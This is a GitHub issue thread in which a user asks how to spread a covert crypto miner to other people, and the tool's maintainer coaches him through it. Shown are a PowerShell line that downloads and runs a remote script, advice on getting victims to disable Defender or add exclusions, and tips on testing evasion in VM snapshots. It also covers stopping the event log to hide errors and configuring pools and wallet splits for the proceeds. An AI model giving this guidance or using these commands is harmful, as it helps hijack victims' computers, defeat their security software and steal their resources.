### ISSUE TITLE
Powershell Spreading

### ISSUE THREAD

**Issue by shainodev** [UnamSanctam/SilentCryptoMiner#2160]
Hypothetically speaking, if I were to spread to people.

What would be the downsides to telling them to Set-MpPreference -DisableRealtimeMonitoring $true and then run a powershell command similar to this: "iwr -useb mywebsite.com/powershell.ps1 | iex" that downloads the miner and runs it.

**Comment by UnamSanctam** [comment]
DisableRealtimeMonitoring might not work if Tampering Protection is enabled.

**Comment by shainodev** [comment]
But if i make them disable more stuff it starts to be more suspicious and takes a lot of time to type

**Comment by UnamSanctam** [comment]
Yes, that's why exclusions are more common.

**Comment by shainodev** [comment]
but how do i make them do exclusions without me exactly specifying them to exclude the dropper location

**Comment by UnamSanctam** [comment]
You can do things like `$env:SystemRoot`, or your powershell command that they run could do that. You will have to do a lot of testing with the different methods to see which work best.

**Comment by shainodev** [comment]
so when i make them exclude system root then it doesn't stop the powershell command when i try to install the miner?

**Comment by UnamSanctam** [comment]
You will have to test it, there are also other types of exclusions. You will have to see which ones work since updates to Windows Defender changes that behavior semi-frequently.

**Comment by shainodev** [comment]
does it matter if i test on my main computer or on a fresh vm?

**Comment by UnamSanctam** [comment]
Not really, though a VM is usually better to make sure the tests are more accurate. It's best to have a snapshot of the VM before you test and then when a detection is caused you go back to the snapshot. Because Windows Defender becomes more strict whenever it starts finding detections.

**Comment by shainodev** [comment]
I still don't get why you didn't use service startup earlier? and also what's the point of stop eventlog, does antiviruses check event log? and what's the point of only doing that when RunInstall and not on every run

**Comment by UnamSanctam** [comment]
>I still don't get why you didn't use service startup earlier? and also what's the point of stop eventlog, does antiviruses check event log? and what's the point of only doing that when RunInstall and not on every run

There are many reasons, the Task Scheduler used to not cause any detections at all, running a program as a service that isn't a service does cause problems, it forces the miner to always run as System which wasn't fully tested before, a service is harder to hide/disguise and the service could get disabled if the user has their computer set to "selective startup". It stops the event log because the miner will cause errors in the event log when installed because it's not a valid service program.

**Comment by shainodev** [comment]
> It stops the event log because the miner will cause errors in the event log when installed because it's not a valid service program.

yeah but it will do that anyway cause u only stop it for one start?

**Comment by UnamSanctam** [comment]
>yeah but it will do that anyway cause u only stop it for one start?

Because that's the most important one, since it prevents the initial errors to appear.

**Comment by shainodev** [comment]
but what do i do if i use

delete service
create service auto
exit()

what do i do with this?

do i make it like this?
delete service
create service auto
event log stop
exit()

**Comment by shainodev** [comment]
so if i dont start service at all then i dont need to event log stop

**Comment by UnamSanctam** [comment]
Yes, the errors are timeout errors when the miner service starts, since the miner isn't a real service program that can respond to service manager requests.

**Comment by shainodev** [comment]
also whats the best coin to mine on gpu? also theres moneroocean what has this function that u mine zephyr but recieve xmr, does any gpu pools have this feature aswell?

**Comment by UnamSanctam** [comment]
You can check for the best GPU profitability: https://whattomine.com/. The other pools with automatic exchange are Zergpool, c3pool and skypool.

**Comment by shainodev** [comment]
i discovered that moneroocean has gpu coins aswell i didnt know that. do u have any config examples for moneroocean for rx/0 and kawpow?

**Comment by UnamSanctam** [comment]
It would be something like this:
**rx/0:**
```
{
	"algo": "rx/0",
	"pool": "gulf.moneroocean.stream",
	"port": 20128,
	"wallet": "XMRWallet",
	"password": "worker~rx/0",
	"ssltls": true
}
```
**kawpow:**
```
{
	"url": "stratums://XMRWallet:worker~kawpow@gulf.moneroocean.stream:20128",
        "algo": "kawpow"
}
```

**Comment by shainodev** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/77803435/11f59404-b000-43a3-b0b5-8242072dc9a8)
like this?

**Comment by shainodev** [comment]
and will this then in return mine zephyr and some gpu coin

**Comment by shainodev** [comment]
and how do i make it so it mines 50% to one wallet and 50% to other wallet

**Comment by UnamSanctam** [comment]
In the GPU miner it should be inside the "Password" field. Those settings will mine Zephyr (since it's the most profitable) and then also probably Neurai. To split the hashrate you would put `XMRWallet1%50%XMRWallet2` as the wallet.

**Comment by shainodev** [comment]
how do i make sure that the moneroocean is actually mining zephyr, cause when i mined xmr and etc then i got 70 cents a day but with this i currently get 40 cents a day even though it should be alot more profitable since it mines the best coins

**Comment by shainodev** [comment]
and another question does the miner check at all like if it is already open or not? cause i make it open every 3 minutes and now the previous one remained opened and i ran a new miner than the other one

**Comment by UnamSanctam** [comment]
>how do i make sure that the moneroocean is actually mining zephyr, cause when i mined xmr and etc then i got 70 cents a day but with this i currently get 40 cents a day even though it should be alot more profitable since it mines the best coins

It automatically mines the most profitable coin, and you can make sure that you're not mining XMR by checking the "Pay hashrate" and "Raw hashrate", if you're not mining XMR then they should be different.

>and another question does the miner check at all like if it is already open or not? cause i make it open every 3 minutes and now the previous one remained opened and i ran a new miner than the other one

Yes it sets a mutex when started, and then the miner checks if that mutex is in use or not to see if the miner is already running.
